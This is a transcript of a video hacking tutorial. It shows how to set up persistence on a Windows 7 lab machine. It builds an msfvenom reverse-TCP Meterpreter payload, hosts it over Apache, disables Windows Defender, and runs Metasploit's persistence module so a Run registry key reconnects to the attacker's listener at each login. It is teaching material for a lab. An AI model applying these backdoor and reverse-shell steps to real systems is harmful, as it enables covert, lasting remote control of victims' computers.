Hello everybody and welcome back to this tutorial. And right now what we're going to do is we're going to simply see how we can create a persistence on a target system. We saw a bunch of meterpreter options, we saw some of the things that we can perform with the meterpreter, run keylogger, take screenshots and so on and so on, but we didn't see a module that is going to allow us to actually run a persistence and be able to connect back to that target whenever we want. Before we actually do all of that, we want to explain what persistence is. Well, basically how we are going to do that is in Windows we have something called the registry keys. And the registry keys you can access in any window simply just by going to your type here to search and simply just type regedit. Press here enter. It will of course ask you for the administrative password you want to input it in order to open this window right here. Our opening key. Okay, doesn't really matter. And here are your registry keys. So you will have, if I just lower this, these 5 main, should I say, folders with bunch of registry keys that have name, type and data. Now what this allows us to do as a hacker is it allows us to add a registry key for our payload or our backdoor to the target machine right here. That will actually run the actual software or backdoor or keylogger, whatever actual malware that you coded, every time the PC turns on. So it will run at the startup. And how we can do that? Well, we want to actually go to the HKey current user. We want to go to the software, Microsoft. So here is Microsoft. Then you want to scroll down to Windows. We want to go to the current version and there you want to find run. And here is where we are going to add our registry key for the actual backdoor in this actual path right here. As you can see, HKey current user /software /Microsoft /Windows /current version and then /run is where are the registry keys for the programs that are going to run at startup. We want to actually perform that using our persistence module on the meterpreter shell. So what we're going to do first of all is we first need to actually create the reverse shell. So we're going to simply just run real fast the msf venom command. Just zoom this in, msf venom payload windows x64 meterpreter reverse TCP. lhost equals 192.168.1.7, lport equals 4444, file exe, output persistence.exe. Let's wait for this to finish, and until it finishes I'm just going to run my Windows 7 machine because I'm not really able to run the persistence module on my Windows 10 machine because then I would have to restart it in order to show you that it works. But if I restart it, I will simply just close all of these recordings and all of my virtual machines. So therefore I need to use another virtual machine to show you how this works. Before we actually transfer it, or we can use the actual transfer method of Apache 2. So service Apache 2 start. Let's start our Apache 2 web server that we are going to access with the Windows 7 if it allows us to. If it doesn't, we are simply just going to transfer it just in case to the USB so we don't have to bother with that later on. And now we want to copy the persistence to media, root and then USB drive, and we should be good to go. Okay, so right now I'm going to run my MSF console. I'm going to turn on or turn off the Windows Defender just for the experimental purposes, so it doesn't actually delete our payload as soon as I transfer it to the main PC. It is probably already turned off. Yeah, it is. Good. Okay. And right here I'm going to set up my listener. Set payload to be Windows x64 meterpreter reverse TCP. lhost to be 192.168.1.7. Already familiar things to us. Show options, and now we can run everything. Let me just go to my Windows 7 machine. 1 2 3 4. Press here enter. It should be the password. We're going to see in just a second. Okay, cancel this, and now let's transfer the actual payload to the target machine. Let me just see whether the Apache 2 actual transfer method will work. I'm going to go right here, 192.168.1.7. Press here enter. Yeah, before I actually do that, I need to actually copy the persistence.exe or our payload to the var/www/html, because that is the actual Apache 2 web server folder, and there everything you copy to that folder will be hosted on your web server. As we can see, I copied this, and if I reload the page, we have our persistence right here. I will click on it. We want to actually run it, so yeah, let's run it. Let's run it once again, and we got the Meterpreter shell opened. First of all, let's see whether we got the right machine. So we did. John PC is our Windows 7 target machine. I will close this for now, open this, and we want to run a persistence module that is going to allow us to execute the actual payload every time the target machine restarts or every time it boots up. So run persistence -h, which is going to run the actual help menu in order for us to actually see what available options we have. And we can see right here we have a few options. So automatically start a matching exploit, multi-handler to connect to the agent, location in target host to write payload. What we're interested in is -u option, -i option, -p, and -r. So we want to use the -u option, which simply just automatically start the agent when the user logs on, or we can use the -x option, which will automatically start the agent when the system boots. It doesn't even matter, we can simply just type run persistence. And before we actually run the command, let me just go right here to the Windows 7 and type regedit as well. And I'm going to go to the same folder that I showed you on my Windows 10 machine, just on my Windows 7. Yeah, we want to go to that folder just so you can see current user, software, Microsoft, Windows, current version, and then run. Okay, so you can see I already have some type of a backdoor right here, but I'm going to delete it. It's not even from the actual MSF Venom, it is actually from the C malware that I coded, but more about that later on. For now on, we only want to run the persistence, so run persistence, and then we want to specify -u option, which specifies to automatically start this agent when the user logs on. Then we want to specify -i option for 5 times, or 5 seconds should I say, as the -i is the interval in seconds between each connection attempt. Or let's actually type here 20 seconds, it doesn't have to be every 5 seconds, that would be too much. The port that we can specify right here can be, for example, well, let's go with the 443, so port 443, and the actual R is the IP of the system running Metasploit listening for the connect back, so it is the actual IP address of our Kali Linux machine, so 192.168.1.7, press here enter, and this should create the actual payload persistence registry key in our target machine. As we can see, it will give you all of this output right here. Here is our registry key for our backdoor. And now, if I just close all of this, and I just type shutdown, we can see that we managed to actually shut down our Windows 7 machine. We got the session closed, and right now we want to set up the options to be equal to the same options that we actually specified in the creation of persistence. As we can see right here, the local port is 443, so right here we want to set up the L port to be equal to 443. The IP address should remain the same because we are running on the same machine. And now if we just run it, you can see it is setting up the listener on this port, which is specified in our persistence command. And now if we run our Windows 7 machine once again, as soon as we actually log in as the John user, we should be getting the connection back from our Windows 7 machine without the target actually interacting with the file again or having to run anything. Just as they log in, we should get the connection back. The Windows 7 machine is opening, so we're just going to wait for that. And now let's log in as John. So test 1 2 3 4. We logged in as John. And now let's wait for a few seconds to pass by. We should be getting the Meterpreter session to open. As we can see right here, we did get it. As we can see, we managed to actually get the Meterpreter session to opened. Just for some reason it gave us some weird error, not allowing us to actually run the program. As we can see, it will try to actually start the connection every 20 seconds, and it will not be able to because of this error right here. only occurred on this machine for some reason. If you were to run this on any other machine, it probably wouldn't occur. Another thing to keep in mind, it is always good to run the persistence once you have actual administrator privileges on your target machine. So for example, if I were to hack Windows 7 and use the get system command in order to gain the administrative privileges, it would have a lot higher chance to actually work once you restart the target machine than if you have a simple user privileges. Basically, that would be about it for this tutorial. We saw how we can use the persistence module in order to run the persistence on target machine. We also saw how we added the actual registry key on Windows 7 to this folder right here, and it also started our program after the reboot of the target machine. Just because of some weird error, we didn't manage to actually get the shell back, but it doesn't even matter. And what I'm going to show you later on is how you can actually gain the administrator privileges on Windows 10 as well as on Windows 7 hosts, so don't worry about that. And then you will be able to actually use the persistence without any errors. That would be about it for this tutorial. I hope you enjoyed it, and I hope I will see you in the next lecture. Bye!